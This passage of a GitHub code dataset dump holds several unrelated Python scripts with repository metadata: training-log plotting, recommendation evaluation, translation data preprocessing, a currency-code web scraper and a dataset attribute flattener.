alpha=0.25)\r\n\tplt.grid(True)\r\n\tplt.savefig(save_dir+filename.split('/')[-1][:-3]+'_fancy.png')\r\n\tplt.show()\r\n\r\ndef plot_log_file_mean_with_raw(filename, save_dir, use_moving_average, use_median_filtering, moving_average_window_size):\r\n\tf = h5py.File(filename,'r')\r\n\tlog = f['log']\r\n\tfield_names = [ \"iter\", \"trueret\", \"iret\", \"trueret_std\", \"ire_std\", \"dl\", \"pgrad\", \"rloss\", \"racc\", \"rgrad\"]\r\n\tfields_to_plot = [field_names[i] for i in [1,3]]\r\n\t\r\n\tmean_raw = [log[i][1] for i in range(log.shape[0])]\r\n\tif use_moving_average:\r\n\t\tmean = moving_average(mean_raw, window_size=moving_average_window_size)\r\n\telif use_median_filtering:\r\n\t\tmean = signal.medfilt(mean_raw, window_size)\r\n\t\r\n\tstd_raw = [log[i][3] for i in range(log.shape[0])]\r\n\tif use_moving_average:\r\n\t\tstd = moving_average(std_raw, window_size=moving_average_window_size)\r\n\telif use_median_filtering:\r\n\t\tstd = signal.medfilt(std_raw, window_size)\r\n\t\r\n\tplt.figure()\r\n\tplt.plot(mean, color='g')\r\n\tplt.plot(mean_raw, color='g', alpha=0.3)\r\n\tplt.plot(std, color='b')\r\n\tplt.plot(std_raw, color='b', 
alpha=0.3)\r\n\tplt.grid(True)\r\n\tplt.savefig(save_dir+filename.split('/')[-1][:-3]+'_withRaw.png')\r\n\t# plt.show()\r\n\r\n\r\ndef compare_methods(filename1, filename2, fields_to_plot, save_dir, use_moving_average, use_median_filtering, window_size):\r\n\tf1 = h5py.File(filename1,'r')\r\n\tf2 = h5py.File(filename2,'r')\r\n\tlog1 = f1['log']\r\n\tlog2 = f2['log']\r\n\tfield_names = [ \"iter\", \"trueret\", \"iret\", \"trueret_std\", \"ire_std\", \"dl\", \"pgrad\", \"rloss\", \"racc\", \"rgrad\"]\r\n\tfor field in fields_to_plot:\r\n\t\tplt.figure()\r\n\t\thandles=[]\r\n\t\tdata1 = [log1[i][field] for i in range(log1.shape[0])]\r\n\t\tif use_moving_average:\r\n\t\t\tdata1 = moving_average(data1, window_size=window_size)\r\n\t\telif use_median_filtering:\r\n\t\t\tdata1 = signal.medfilt(data1, window_size)\r\n\t\ttmp, = plt.plot(data1, label=filename1.split('/')[-1])\r\n\t\thandles.append(tmp)\r\n\t\tdata2 = [log2[i][field] for i in range(log2.shape[0])]\r\n\t\tif use_moving_average:\r\n\t\t\tdata2 = moving_average(data2, window_size=window_size)\r\n\t\telif use_median_filtering:\r\n\t\t\tdata2 = signal.medfilt(data2, window_size)\r\n\t\ttmp, = plt.plot(data2, label=filename2.split('/')[-1])\r\n\t\thandles.append(tmp)\r\n\t\tplt.legend(handles=handles)\r\n\t\tplt.grid(True)\r\n\t\tplt.savefig(save_dir+filename1.split('/')[-1][:-3]+'--vs--'+filename2.split('/')[-1][:-3]+'-'+field_names[field]+'.png')\r\n\t\tplt.show()\r\n\r\ndef write_csv(in_filename=None, out_filename=None):\r\n\tf_in = h5py.File(in_filename,'r')\r\n\tlog = f_in['log']\r\n\tf_out = open(out_filename,'w')\r\n\t# field_names = [ \"iter\", \"trueret\", \"iret\", \"trueret_std\", \"ire_std\", \"nu\", \"Lambda\", \"dl\", \"pgrad\", \"rloss\", \"racc\", \"rgrad\"]\r\n\tfield_names = [\"iter\", \"trueret\", \"iret\", \"trueret_std\", \"ire_std\", \"dl\", \"rloss\", \"racc\", \"rgrad\"]\r\n\t# print fields\r\n\tfor field in field_names:\r\n\t\tf_out.write(field+',')\r\n\tf_out.write('\\n')\r\n\r\n\t# print the log data line by line\r\n\tfor line_num in range(log.shape[0]):\r\n\t\tfor entry in log[line_num]:\r\n\t\t\tf_out.write(str(entry)+',')\r\n\t\tf_out.write('\\n')\r\n\tf_out.close()\r\n\r\n\r\ndef plot_csv(file_name, use_moving_average, moving_average_window_size, plot_all_fields, plot_fields, save_dir, expert_level):\r\n\tdf = pd.read_csv(file_name, sep=',')\r\n\ttitles = list(df)\r\n\tplt.figure()\r\n\thandles = []\r\n\tif plot_all_fields:\r\n\t\tfor i in range(len(titles)):\r\n\t\t\tdata2plot = df.iloc[:,i]\r\n\t\t\tif use_moving_average:\r\n\t\t\t\tdata2plot = moving_average(data2plot, window_size=moving_average_window_size)[:-moving_average_window_size]\r\n\t\t\ttmp, = plt.plot(data2plot, label=titles[i])\r\n\t\t\thandles.append(tmp)\r\n\telse:\r\n\t\tfor i in plot_fields:\r\n\t\t\tdata2plot = df.iloc[:,i]\r\n\t\t\tif use_moving_average:\r\n\t\t\t\tdata2plot = moving_average(data2plot, window_size=moving_average_window_size)[:-moving_average_window_size]\r\n\t\t\ttmp, = plt.plot(data2plot, label=titles[i])\r\n\t\t\thandles.append(tmp)\r\n\ttmp, = plt.plot(expert_level*np.ones((1500,)), label=\"expert\")\r\n\thandles.append(tmp)\r\n\tplt.legend(handles=handles)\r\n\tplt.grid(True)\r\n\tplt.savefig(save_dir+file_name.split('/')[-1][:-4]+'.png')\r\n\tplt.show()\r\n\r\n\r\nif __name__=='__main__':\r\n\tparser = argparse.ArgumentParser()\r\n\tparser.add_argument('--plot_single', action='store_true')\r\n\tparser.add_argument('--plot_fancy', action='store_true')\r\n\tparser.add_argument('--plot_fancy_raw', 
action='store_true')\r\n\tparser.add_argument('--file_name', type=str, help=\".h5 file path if --plot_single or --write_csv and .csv file path if --plot_csv\")\r\n\tparser.add_argument('--compare', action='store_true')\r\n\tparser.add_argument('--file_name1', type=str, help=\".h5 file path 1 if --compare\")\r\n\tparser.add_argument('--file_name2', type=str, help=\".h5 file path 2 if --compare\")\r\n\tparser.add_argument('--save_dir', type=str, default=\"./\", help=\"directory for saving plots\")\r\n\tparser.add_argument('--use_moving_average', action='store_true')\r\n\tparser.add_argument('--use_median_filtering', action='store_true')\r\n\tparser.add_argument('--moving_average_window_size', type=int, default=3)\r\n\tparser.add_argument('--write_csv', action='store_true')\r\n\tparser.add_argument('--plot_csv', action='store_true')\r\n\tparser.add_argument('--plot_all_fields', action='store_true')\r\n\t#TODO: fix the following line - add separate conditions for different fields\r\n\tparser.add_argument('--expert_level', type=float, default=EXPERT_STD)\r\n\r\n\targs = parser.parse_args()\r\n\tfields_to_plot = [1,3]\r\n\tif args.plot_single:\r\n\t\tplot_log_file(args.file_name, fields_to_plot=fields_to_plot, save_dir=args.save_dir, use_moving_average=args.use_moving_average, moving_average_window_size=args.moving_average_window_size)\r\n\telif args.compare:\r\n\t\tcompare_methods(filename1=args.file_name1, filename2=args.file_name2, fields_to_plot=fields_to_plot, save_dir=args.save_dir, use_moving_average=args.use_moving_average, use_median_filtering=args.use_median_filtering, window_size=args.moving_average_window_size)\r\n\telif args.write_csv:\r\n\t\tout_filename = args.save_dir+args.file_name.split('/')[-1][:-3]+'.csv'\r\n\t\twrite_csv(args.file_name, out_filename)\r\n\telif args.plot_csv:\r\n\t\tplot_fields = [0,1,-1]\r\n\t\tplot_csv(file_name=args.file_name, use_moving_average=args.use_moving_average, moving_average_window_size=args.moving_average_window_size, plot_all_fields=args.plot_all_fields, plot_fields=plot_fields, save_dir=args.save_dir, expert_level=args.expert_level)\r\n\telif args.plot_fancy:\r\n\t\tplot_log_file_fancy(args.file_name, save_dir=args.save_dir, use_moving_average=args.use_moving_average, use_median_filtering=args.use_median_filtering, moving_average_window_size=args.moving_average_window_size)\r\n\telif args.plot_fancy_raw:\r\n\t\tplot_log_file_mean_with_raw(args.file_name, save_dir=args.save_dir, use_moving_average=args.use_moving_average, use_median_filtering=args.use_median_filtering, moving_average_window_size=args.moving_average_window_size)\r\n", "repo_name": "Santara/RAIL", "sub_path": "scripts/read_h5_logs_and_analyse.py", "file_name": "read_h5_logs_and_analyse.py", "file_ext": "py", "file_size_in_byte": 8827, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 14, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.ones", "line_number": 14, "usage_type": "call"}, {"api_name": "numpy.convolve", "line_number": 16, "usage_type": "call"}, {"api_name": "h5py.File", "line_number": 20, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 23, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 23, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 29, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 29, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 31, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", 
"line_number": 31, "usage_type": "name"}, {"api_name": "numpy.ones", "line_number": 31, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 33, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 33, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 34, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 34, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 35, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 35, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 36, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 36, "usage_type": "name"}, {"api_name": "h5py.File", "line_number": 39, "usage_type": "call"}, {"api_name": "scipy.signal.medfilt", "line_number": 48, "usage_type": "call"}, {"api_name": "scipy.signal", "line_number": 48, "usage_type": "name"}, {"api_name": "scipy.signal.medfilt", "line_number": 54, "usage_type": "call"}, {"api_name": "scipy.signal", "line_number": 54, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 56, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 56, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 57, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 57, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.fill_between", "line_number": 58, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 58, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 59, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 59, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 60, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 60, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 61, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 61, "usage_type": "name"}, {"api_name": "h5py.File", "line_number": 64, "usage_type": "call"}, {"api_name": "scipy.signal.medfilt", "line_number": 73, "usage_type": "call"}, {"api_name": "scipy.signal", "line_number": 73, "usage_type": "name"}, {"api_name": "scipy.signal.medfilt", "line_number": 79, "usage_type": "call"}, {"api_name": "scipy.signal", "line_number": 79, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 81, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 81, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 82, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 82, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 83, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 83, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 84, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 84, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 85, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 85, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 86, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 86, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 87, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 87, "usage_type": "name"}, {"api_name": 
"h5py.File", "line_number": 92, "usage_type": "call"}, {"api_name": "h5py.File", "line_number": 93, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 98, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 98, "usage_type": "name"}, {"api_name": "scipy.signal.medfilt", "line_number": 104, "usage_type": "call"}, {"api_name": "scipy.signal", "line_number": 104, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 105, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 105, "usage_type": "name"}, {"api_name": "scipy.signal.medfilt", "line_number": 111, "usage_type": "call"}, {"api_name": "scipy.signal", "line_number": 111, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 112, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 112, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 114, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 114, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 115, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 115, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 116, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 116, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 117, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 117, "usage_type": "name"}, {"api_name": "h5py.File", "line_number": 120, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 139, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 141, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 141, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 148, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 148, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 155, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 155, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 157, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 157, "usage_type": "name"}, {"api_name": "numpy.ones", "line_number": 157, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 159, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 159, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 160, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 160, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 161, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 161, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 162, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 162, "usage_type": "name"}, {"api_name": "argparse.ArgumentParser", "line_number": 166, "usage_type": "call"}]} +{"seq_id": "23852145195", "text": "# evaluation.py \n# script holding function to evaluate the quality of recommendation based on queried metadata\n\n# last modified : 29/11/21\n# author : jonas-mika senghaas\n\nimport json\nimport os\nimport numpy as np\nfrom tqdm import tqdm\n\n\n#from envvars import GITHUB_TOKEN\n#from github_api import ReposSummary\n\n\"\"\"\n# expected format for recommendations\nmetadata = {'luky/na': 
{'languages': [['Python', 550], ['Java', 220]]}, \n 'jonas-mika/eduml': {'languages': [['Python', 2000]]},\n 'ludek/dotfiles': {'languages': [['vim', 220], ['Python', 100]]}\n }\n\ndata = {'rails/rails': ['technoweenie/restful-authentication']}\n\n\"\"\"\ndef build_evaluation_metadata(metadata, attributes, filepath='.', name='evaluation_metadata'):\n os.makedirs(filepath) if not os.path.exists(filepath) else None\n\n ans = {}\n for key, val in metadata.items():\n try:\n nkey = metadata[key]['repo_name']\n nval = {attribute: metadata[key][attribute] for attribute in attributes}\n except: None\n\n ans[nkey] = nval\n\n with open(f'{filepath}/{name}.json', 'w') as outfile:\n json.dump(ans, outfile)\n\n\n\ndef evaluate_recommendation(recommendations, metadata, attributes, test_size=0.5, total_score=False):\n \"\"\"\n function to evaluate the quality of the recommendation based on metadata.\n reads in underlying datastructure of the recommendation system (a dictionary that \n for each repo stores a list of n recommended repos, each being stored as a dictionary\n themselves with key being the recommended repo name and values being a dict of the metadata.\n\n Algorithmic Idea for Evaluation:\n A 'good recommendation' is defined to be a repository that is similar in some instances to \n the source repository. Thus, the idea is to assign a score of similarity \n for different features of the recommended repositories, namely for:\n - languages ( len of intersection / length of union of languages for each repo)\n - tags ( len of intersectio / length of union of repos for each repo)\n\n the score is averaged over the n recommended repository, the per repo score is a weighted\n average. the total score is averaged over all recommendations.\n \"\"\"\n n_repos = len(recommendations)\n\n\n if isinstance(test_size, int):\n random_sample_repos = np.random.choice(list(recommendations.keys()), size=test_size, replace=False) \n random_sample = {repo: recommendations[repo] for repo in random_sample_repos} \n elif isinstance(test_size, float):\n random_sample_repos = np.random.choice(list(recommendations.keys()), size=int(test_size*n_repos), replace=False)\n random_sample = {repo: recommendations[repo] for repo in random_sample_repos} \n\n random_sample = recommendations\n attribute_scores = {attribute: None for attribute in attributes}\n for attribute in attributes:\n attribute_score = _evaluate_attribute(random_sample, \n metadata, \n attribute, \n algorithm='jaccard', normalise=True)\n attribute_scores[attribute] = attribute_score\n\n if total_score:\n return np.mean(list(attribute_scores.values()))\n return attribute_scores\n\n\ndef _evaluate_attribute(random_sample, metadata, attribute, algorithm='jaccard', normalise=True):\n attribute_score = 0\n\n n_repos = len(random_sample)\n #n_recommend = len(list(random_sample.values())[0])\n\n # api = ReposSummary(GITHUB_TOKEN)\n\n src_missing = 0 \n for repo in random_sample: # maybe: subset of repos\n repo_score = 0\n\n src = metadata[repo] \n #print('working on: ', repo)\n src_attr = {x[0] for x in src[attribute]}\n\n if src_attr == None:\n src_missing += 1\n continue\n\n trg_missing = 0\n n_recommend = 0\n for recommended in random_sample[repo]:\n trg = metadata[recommended]\n trg_attr = {x[0] for x in trg[attribute]}\n\n if trg_attr == None:\n trg_missing += 1\n continue\n\n #print(src_attr, trg_attr)\n score = len(src_attr & trg_attr) / len(src_attr | trg_attr)\n #print(score)\n repo_score += score\n n_recommend += 1\n\n # normalise all score\n if n_recommend - 
trg_missing > 0:\n repo_score /= (n_recommend - trg_missing) \n else:\n repo_score = 0\n #print(repo_score, '\\n')\n attribute_score += repo_score\n\n # normalise summed attributes score and add total score\n if n_repos - src_missing > 0:\n attribute_score /= (n_repos - src_missing)\n else:\n attribute_score = 0\n\n return attribute_score\n\n\nif __name__ == '__main__':\n np.random.seed(0)\n with open('../data/transformed/metadata.json') as infile:\n metadata = json.load(infile)\n\n build_evaluation_metadata(metadata, ['languages'],filepath='../data/evaluation/')\n with open('../data/evaluation/evaluation_metadata.json', 'r') as infile:\n metadata = json.load(infile)\n\n algs = ['naive_hyperbolic','search_depth_hyperbolic'] #['naive_recommend', 'search_depth']\n\n for alg in algs:\n with open(f'./{alg}.json', 'r') as infile:\n data = json.load(infile)\n\n print(alg, ':', evaluate_recommendation(data, metadata, attributes=['languages'], test_size=0.5))\n", "repo_name": "ludekcizinsky/project-repommend", "sub_path": "cscripts/evaluation.py", "file_name": "evaluation.py", "file_ext": "py", "file_size_in_byte": 5464, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.path.exists", "line_number": 27, "usage_type": "call"}, {"api_name": "os.path", "line_number": 27, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 27, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.random.choice", "line_number": 64, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 64, "usage_type": "attribute"}, {"api_name": "numpy.random.choice", "line_number": 67, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 67, "usage_type": "attribute"}, {"api_name": "numpy.mean", "line_number": 80, "usage_type": "call"}, {"api_name": "numpy.random.seed", "line_number": 138, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 138, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 140, "usage_type": "call"}, {"api_name": "json.load", "line_number": 144, "usage_type": "call"}, {"api_name": "json.load", "line_number": 150, "usage_type": "call"}]} +{"seq_id": "7091435767", "text": "import re\r\nimport unicodedata\r\nimport torch\r\n\r\nfrom dictionary import Dictionary\r\n\r\nPAD_TOKEN = 0\r\nSOS_TOKEN = 1\r\nEOS_TOKEN = 2\r\n\r\n#https://stackoverflow.com/a/518232/2809427\r\ndef unicodeToAscii(s):\r\n return ''.join(\r\n c for c in unicodedata.normalize('NFD', s)\r\n if unicodedata.category(c) != 'Mn'\r\n )\r\n\r\ndef normalizeString(s):\r\n s = unicodeToAscii(s.lower().strip())\r\n s = re.sub(r\"([.!?])\", r\" \\1\", s)\r\n s = re.sub(r\"[^a-zA-Z.!?]+\", r\" \", s)\r\n return s\r\n\r\n#load language into lists of sentences where corresponding indeces are translations from\r\n#one language to the other\r\n\r\n#reverse controls with language is input and output\r\n#FALSE: lang1 is input and lang2 is output\r\n#TRUE: lang2 is input and lang1 is output\r\ndef load_files(lang1, lang2, data_dir, reverse=True, MAX_FILE_SIZE=100000, MAX_LENGTH=60):\r\n #load first language to list\r\n lang1_list = []\r\n lang1_file = open(data_dir + '/' + lang1 + '-' + lang2 + '/' + lang1 + '.txt', 'r', encoding='utf8')\r\n for i, (line) in enumerate(lang1_file):\r\n if i < MAX_FILE_SIZE:\r\n lang1_list.append(line)\r\n else:\r\n break\r\n\r\n # load second langauge to list\r\n lang2_list = []\r\n lang2_file = open(data_dir + '/' 
+ lang1 + '-' + lang2 + '/' + lang2 + '.txt', 'r', encoding='utf8')\r\n for i, (line) in enumerate(lang2_file):\r\n if i < MAX_FILE_SIZE:\r\n lang2_list.append(line)\r\n else:\r\n break\r\n\r\n #preprocess strings\r\n lang1_normalized = list(map(normalizeString, lang1_list))\r\n lang2_normalized = list(map(normalizeString, lang2_list))\r\n\r\n lang1_sentences = []\r\n lang2_sentences = []\r\n\r\n for i in range(len(lang1_normalized)):\r\n tokens1 = lang1_normalized[i].split(' ')\r\n tokens2 = lang2_normalized[i].split(' ')\r\n if len(tokens1) <= MAX_LENGTH and len(tokens2) <= MAX_LENGTH:\r\n lang1_sentences.append(lang1_normalized[i])\r\n lang2_sentences.append(lang2_normalized[i])\r\n\r\n del lang1_normalized\r\n del lang2_normalized\r\n\r\n if reverse:\r\n input_dic = Dictionary(lang2)\r\n output_dic = Dictionary(lang1)\r\n return input_dic, output_dic, lang2_sentences, lang1_sentences\r\n else:\r\n input_dic = Dictionary(lang1)\r\n output_dic = Dictionary(lang2)\r\n return input_dic, output_dic, lang1_sentences, lang2_sentences\r\n\r\n#takes in a sentence and dictionary, and tokenizes based on dictionary\r\ndef tokenize(sentence, dictionary, MAX_LENGTH=60):\r\n split_sentence = [word for word in sentence.split(' ')]\r\n token = [SOS_TOKEN]\r\n token += [dictionary.word2index[word] for word in sentence.split(' ')]\r\n token.append(EOS_TOKEN)\r\n token += [PAD_TOKEN]*(MAX_LENGTH - len(split_sentence))\r\n return token\r\n\r\n#create dataloader from a batch size and the two language lists\r\ndef load_batches(input_lang, output_lang, batch_size, device):\r\n data_loader = []\r\n for i in range(0, len(input_lang), batch_size):\r\n seq_length = min(len(input_lang) - batch_size, batch_size)\r\n input_batch = input_lang[i:i+seq_length][:]\r\n target_batch = output_lang[i:i+seq_length][:]\r\n input_tensor = torch.LongTensor(input_batch).to(device)\r\n target_tensor = torch.LongTensor(target_batch).to(device)\r\n data_loader.append([input_tensor, target_tensor])\r\n return data_loader", "repo_name": "u7javed/Transformer-Multi-Language-Translator", "sub_path": "utilities.py", "file_name": "utilities.py", "file_ext": "py", "file_size_in_byte": 3379, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 14, "dataset": "github-code", "pt": "53", "api": [{"api_name": "unicodedata.normalize", "line_number": 14, "usage_type": "call"}, {"api_name": "unicodedata.category", "line_number": 15, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 20, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 21, "usage_type": "call"}, {"api_name": "dictionary.Dictionary", "line_number": 67, "usage_type": "call"}, {"api_name": "dictionary.Dictionary", "line_number": 68, "usage_type": "call"}, {"api_name": "dictionary.Dictionary", "line_number": 71, "usage_type": "call"}, {"api_name": "dictionary.Dictionary", "line_number": 72, "usage_type": "call"}, {"api_name": "dictionary.word2index", "line_number": 79, "usage_type": "attribute"}, {"api_name": "torch.LongTensor", "line_number": 91, "usage_type": "call"}, {"api_name": "torch.LongTensor", "line_number": 92, "usage_type": "call"}]} +{"seq_id": "27952832416", "text": "import requests\nfrom bs4 import BeautifulSoup\n\nURL = requests.get(\"https://www.iban.com/currency-codes\")\nsoup = BeautifulSoup(URL.text, \"html.parser\")\n\npages = soup.find(\"table\",{\"class\":\"table\"})\npage = pages.find_all(\"tbody\")\n\ntemporarily = {}\nnumber_country = {}\n\ncountries_lists = []\nfor country in page:\n\n a = country.find_all(\"td\")\n a = 
list(a)\n\n country_list = 0\n code_list = 2\n\n while code_list >= 0:\n b = a[country_list].text\n c = a[code_list].text \n temporarily[f\"{b}\"] = f\"{c}\"\n country_list +=4\n code_list +=4\n if code_list >= len(a):\n break\n results = {key: value for key, value in temporarily.items() if len(value) != 0}\n\ncountries_lists.append(list(results))\ncountries_lists = countries_lists[0]\ncountries_list = [i.strip() for i in countries_lists]\n\n\ndef start():\n country = results.keys() \n max_numb = len(results.keys()) \n number = 0\n print(\"hello, my friend! Please choose select a country by number:\")\n for i in country: \n print(f\" # {number} {i}\")\n number += 1\n if number >= max_numb:\n break\n while[1]:\n try:\n select = int(input(\" # : \")) \n if countries_list[select] in countries_list:\n print(F\" You choose {countries_list[select]} \\n The currency code is {results[countries_list[select]]}\")\n break\n elif type(select) == int:\n print(\" please, enter a number from the list.\")\n else:\n print(\" That's wasn't a number.\") \n except: \n print(\" That's wasn't a number.\")\n\nstart()", "repo_name": "WinterWhiteSnow/github", "sub_path": "~08.01까지/nadocoding/6.18.py", "file_name": "6.18.py", "file_ext": "py", "file_size_in_byte": 1715, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "requests.get", "line_number": 4, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 5, "usage_type": "call"}]} +{"seq_id": "40399551079", "text": "# -*- coding: utf-8 -*-\n\nimport argparse\nimport os\nfrom multiprocessing import Pool, cpu_count\n\nfrom ncc_dataset.codexglue.code_to_text import (\n LANGUAGES, RAW_DIR, ATTRIBUTES_DIR,\n)\nfrom ncc import LOGGER\nfrom ncc.utils.file_ops import (\n file_io,\n json_io,\n)\nfrom ncc.utils.path_manager import PathManager\n\n\ndef flatten_attrs(raw_file, flatten_dir, lang, attrs):\n def _get_file_info(filename):\n \"\"\"get mode and file index from file name\"\"\"\n filename = os.path.split(filename)[-1]\n mode = filename[:str.rfind(filename, '.jsonl')]\n return mode\n\n mode = _get_file_info(raw_file)\n attr_writers = {}\n for attr in attrs:\n attr_file = os.path.join(flatten_dir, lang, f'{mode}.{attr}')\n PathManager.mkdir(os.path.dirname(attr_file))\n attr_writers[attr] = file_io.open(attr_file, 'w')\n print('raw_file: ', raw_file)\n with file_io.open(raw_file, 'r') as reader:\n for line in reader:\n code_snippet = json_io.json_loads(line)\n for attr, info in code_snippet.items():\n if attr in attr_writers:\n print(json_io.json_dumps(info), file=attr_writers[attr])\n\n\ndef flatten(raw_dir, lang, flatten_dir, attrs, num_cores):\n \"\"\"flatten attributes of raw data\"\"\"\n LOGGER.info('Flatten the attributes({}) of {} raw dataset'.format(attrs, lang))\n\n with Pool(num_cores) as mpool:\n result = [\n mpool.apply_async(\n flatten_attrs,\n (raw_file, flatten_dir, lang, set(attrs))\n )\n for raw_file in PathManager.ls(os.path.join(raw_dir, lang, '*.jsonl'))\n ]\n result = [res.get() for res in result]\n\n\nif __name__ == '__main__':\n \"\"\"\n This script is to flatten attributes of code_search_net dataset\n Examples: 'code', 'code_tokens', 'docstring', 'docstring_tokens', 'func_name', 'original_string', 'index',\n \"\"\"\n parser = argparse.ArgumentParser(description=\"Download CodeSearchNet dataset(s) or Tree-Sitter Library(ies)\")\n parser.add_argument(\n \"--languages\", \"-l\", default=LANGUAGES, type=str, nargs='+', help=\"languages constain 
[{}]\".format(LANGUAGES),\n )\n parser.add_argument(\n \"--raw_dataset_dir\", \"-r\", default=RAW_DIR, type=str, help=\"raw dataset download directory\",\n )\n parser.add_argument(\n \"--attributes_dir\", \"-d\", default=ATTRIBUTES_DIR, type=str, help=\"data directory of flatten attribute\",\n )\n parser.add_argument(\n \"--attrs\", \"-a\",\n default=['code', 'code_tokens', 'docstring', 'docstring_tokens', 'func_name'],\n type=str, nargs='+',\n help=\"attrs: code, code_tokens, docstring\",\n )\n parser.add_argument(\n \"--cores\", \"-c\", default=cpu_count(), type=int, help=\"cpu cores for flatten raw data attributes\",\n )\n args = parser.parse_args()\n # print(args)\n\n for lang in args.languages:\n flatten(raw_dir=args.raw_dataset_dir, lang=lang, flatten_dir=args.attributes_dir, attrs=args.attrs,\n num_cores=args.cores)\n", "repo_name": "CGCL-codes/naturalcc", "sub_path": "ncc_dataset/codexglue/code_to_text/attributes_cast.py", "file_name": "attributes_cast.py", "file_ext": "py", "file_size_in_byte": 3056, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 220, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.path.split", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path", "line_number": 28, 